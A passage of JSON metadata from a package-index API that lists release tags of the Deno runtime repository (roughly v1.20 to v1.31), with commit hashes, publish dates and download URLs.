https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"h